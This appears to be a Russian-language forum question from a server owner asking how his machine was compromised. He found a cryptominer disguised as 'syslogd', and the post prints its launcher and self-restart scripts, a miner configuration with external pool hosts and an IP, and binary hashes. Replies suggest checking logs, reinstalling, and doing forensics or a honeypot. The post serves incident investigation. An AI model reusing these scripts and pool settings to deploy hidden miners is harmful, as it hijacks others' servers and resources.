Кто и как взломал мой сервер?
469
Sasha
На моем сервере я увидел, что «syslogd» потребляет довольно много ресурсов ЦП и работает как локальный пользователь «copy: copy» (действительный пользователь в моей системе). Короткое расследование показало, что этот "syslogd" был запущен отсюда:
ls /tmp/.mysql-2566 -rw-rw-r-- 1 copy copy 5 Nov 26 00:53 bash.pid -rwxrwxr-x 1 copy copy 838583 Feb 20 2016 f -rwxr-xr-x 1 copy copy 1049 Sep 24 08:45 httpd -rwxr-xr-x 1 copy copy 276 Sep 24 08:46 r -rwxr-xr-x 1 copy copy 1687632 Sep 24 07:52 syslogd -rwxrw-r-- 1 copy copy 182 Oct 13 02:53 upd
Процесс перезапускался сам по себе, единственный способ предотвратить это - переименовать каталог.
Конечно, все это не имеет ничего общего с syslogd / httpd / mysql. Файлы "f" и "syslogd" являются двоичными. И я показываю ниже содержание других файлов для полноты:
[root]# cat r #!/bin/bash ARCH=`uname -m` HIDE="/var/www/httpd2" hostname=`hostname` if [ "$ARCH" == "i686" ]; then ./e -s $HIDE ./systemd -c httpd >>/dev/null & elif [ "$ARCH" == "x86_64" ]; then ./f -s $HIDE ./syslogd -c httpd >>/dev/null & fi echo $! > bash.pid
Следующий файл:
[root]# cat upd #!/bin/sh if test -r /tmp/.mysql-2566/bash.pid; then pid=$(cat /tmp/.mysql-2566/bash.pid) if $(kill -CHLD $pid >/dev/null 2>&1) then exit 0 fi fi cd /tmp/.mysql-2566 ./r &>/dev/null
И файл "config":
[root]# cat httpd { "algo": "cryptonight", "api": { "port": 0, "access-token": null, "worker-id": null, "ipv6": false, "restricted": true }, "av": 0, "background": false, "colors": true, "cpu-priority": null, "donate-level": 0, "log-file": null, "pools": [ { "url": "nopro.online:80", "user": "hash", "pass": "x", "keepalive": true, "nicehash": false, "variant": -1 }, { "url": "nopro.xyz:80", "user": "hash", "pass": "x", "keepalive": true, "nicehash": false, "variant": -1 }, { "url": "146.0.253.66:80", "user": "hash", "pass": "x", "keepalive": true, "nicehash": false, "variant": -1 } ], "print-time": 60, "retries": 3, "retry-pause": 3, "safe": false, "syslog": false, "threads": null }
Подписи двоичных файлов:
[root]# sha1sum f syslogd 59f5b21ef8a570c02453b5edb0e750a42a1382f6 f f00e1f4c277bdb99319f4c7540e0c5637d5ef07d syslogd
Вход в систему пользователя root отключен, а у пользователя «sudo» надежный пароль.
- Как я могу узнать, как сервер был взломан?
- Кто (и откуда) устанавливает файлы в /tmp/.mysql-2566?
- Кто-нибудь еще сталкивался с такой проблемой?
Заранее большое спасибо!
Это не будет простой ответ, вам нужно прочесать лог-файлы, чтобы понять, что случилось с вашим сервером. Отправной точкой будет любой процесс, который выполняется с идентификатором пользователя «copy», более того, если он имеет открытый внешний интерфейс (прослушивающий сокет). Если нет, вам нужно будет вернуться к этому идентификатору пользователя. В любом случае система кажется довольно скомпрометированной, она требует полной переустановки
silmaril 5 лет назад
2
Кроме того, если вы хотите заниматься судебной экспертизой, не делайте этого в реальной системе. Настройка honeypot также может быть хорошей идеей, если вы не можете извлечь достаточно информации с скомпрометированного сервера.
dirkt 5 лет назад
1
0 ответов на вопрос
Похожие вопросы
-
9
В чем разница между командами "su -s" и "sudo -s"?
-
4
Требуется хороший бесплатный образ Ubuntu Server VMWare
-
4
Какое программное обеспечение я должен использовать для шифрования моего жесткого диска?
-
-
4
Каковы различия между основными дистрибутивами Linux? Я замечу?
-
2
Ограничить использование процессора для Flash в Firefox?
-
2
Как мне заставить мой микрофон работать под Debian GNOME?
-
2
Конки установки - образцы / идеи?
-
2
Windows 7 Home Premium запоминает пароли общего доступа к сети?
-
3
Может ли существующее шифрование беспроводной сети реально защитить сеть?
-
3
Каковы различия между оконными менеджерами Linux?